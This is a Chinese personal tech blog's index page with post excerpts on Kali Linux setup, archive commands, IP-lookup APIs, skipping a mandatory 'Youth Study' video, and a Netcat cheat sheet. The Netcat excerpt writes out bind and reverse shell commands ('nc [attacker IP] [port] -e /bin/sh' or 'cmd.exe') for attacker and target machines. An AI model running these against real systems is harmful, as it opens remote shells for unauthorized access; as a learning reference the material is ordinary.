Myluzh Blog

Strive to become a dream architect.

青年大学习一键跳过与实现原理分析

2020-7-20 myluzh NOTE

0x01 前言     又到了每周一次的青年大学习时间了,青年大学习时长也从小视频慢慢变成了大电影...     众所周知,用苹果手机可以直接把进度条直接拖到最后直接完成学习,这种拖动进度条的方式的确可以实现一键跳过。     今天有人来问我,能不能实现安卓手机一键跳过青年大学习,想要实现也不是不可能,花了一点时间分析了下青年大学习,emmm然后写了篇文章记录下。 0x02 分析     下面我们分析从输入信息到学习完成后,服务端跟客户端之间的请求结构。 1.当我们输入完信息,点击开始“去学习”后,页面会跳转,跳转时并未传递任何参数,拦截下来的跳转地址为 http://h5.cyol.com/special/daxuexi/9rclojmfh12/m.html 2.点击“开始学习”后,继续进行拦截,本地会GET一个.mp4视频过来,这个就是我们要看的青年大学习视频。 3.继续拦截分析发现,直到视频看完,客户端与服务端也没有进行任何数据交互行为了。 0x03 结论     ...

阅读全文>>

标签: 青年大学习

评论(0) (2547)

整理了一些IP地址查询API接口

2020-5-2 myluzh NOTE

0x01国内 ###搜狐接口 http://pv.sohu.com/cityjson    #默认GBK http://pv.sohu.com/cityjson?ie=utf-8    #可设置编码 ###太平洋接口 http://whois.pconline.com.cn/ipJson.jsp?ip=xxx.xxx.xxx.xxx&json=true 0x02国外 ###ip-api http://ip-api.com/json/    # 国际化英文显示 http://ip-api.com/json/?lang=zh-CN  # 中文显示 http://ip-api.com/json/xxx.xxx.xxx.xxx?lang=zh-CN  # 查询某个ip的信息 ###hostip http://api.hostip.info/get_html.php?ip=xxx.xxx.xxx.xxx

阅读全文>>

标签: IP接口

评论(0) (590)

解决Kali中文乱码显示方块的问题

2020-3-15 myluzh NOTE

装完Kali虚拟机,无法正常显示中文,都是方块乱码。 解决方法: 1.更新Kali源 2.终端下执行 sudo apt-get install ttf-wqy-zenhei 3.重启 reboot

阅读全文>>

标签: kali linux 乱码

评论(0) (811)

Kali Liunx下解压缩zip,tar,tar.gz,tar.bz2文件

2020-3-10 myluzh NOTE

tar(注:tar是打包,不是压缩!) 解包:tar xvf FileName.tar 打包:tar cvf FileName.tar DirName .gz 解压1:gunzip FileName.gz 解压2:gzip -d FileName.gz 压缩:gzip FileName .tar.gz 解压:tar zxvf FileName.tar.gz 压缩:tar zcvf FileName.tar.gz DirName .bz2 解压1:bzip2 -d FileName.bz2 解压2:bunzip2 FileName.bz2 压缩: bzip2 -z FileName .tar.bz2 解压:tar jxvf FileName.tar.bz2 压缩:tar jcvf FileName.tar.bz2 DirName .bz 解压1:bzip2 -d FileName.bz 解压2:bunzip2 FileName.bz .tar.bz 解压:tar jxvf FileName.tar.bz .Z 解压:uncompress FileName.Z 压缩...

阅读全文>>

标签: kali linux 解压 压缩 zip tar tar.gz tar.bz2

评论(0) (554)

Netcat基本用法总结

2020-3-6 myluzh NOTE

0x01基础使用 靶机创建一个服务端: nc -nvlp [端口] 攻击机开启监听: nc [服务端IP] [端口] 0x02获取shell 正向shell 靶机创建一个服务端: #Windows nc -nvlp [端口] -e cmd.exe #Linux nc -nvlp [端口] -e /bin/sh 攻击机开启监听: nc [服务端IP] [端口] 反向shell 靶机创建一个服务端: #Windows nc [攻击机IP] [端口] -e cmd.exe #Linux nc [攻击机IP] [端口] -e /bin/sh 攻击机开启监听: nc -nvlp [端口] 有些时候靶机上并没有nc,所以需要php反弹shell来实现,关于php反弹shell脚本 0x03文件传输 靶机创建一个服务端: nc -nvlp [端口] >1.txt 攻击机接受文件: nc [服务端IP] [端口] <1.txt 参考资料: Netcat下载地址:https://eternallybored.org/misc/netcat/ “瑞士军刀”N...

阅读全文>>

评论(0) (793)

Kali Liunx更新源-国内Kali源

2020-3-6 myluzh NOTE

0x01编辑kali的更新源地址文件 sudo vim /etc/apt/sources.list 0x02添加下面的源地址(选择几个增加即可) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清华大学 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-r...

阅读全文>>

标签: kali linux 更新源

评论(0) (670)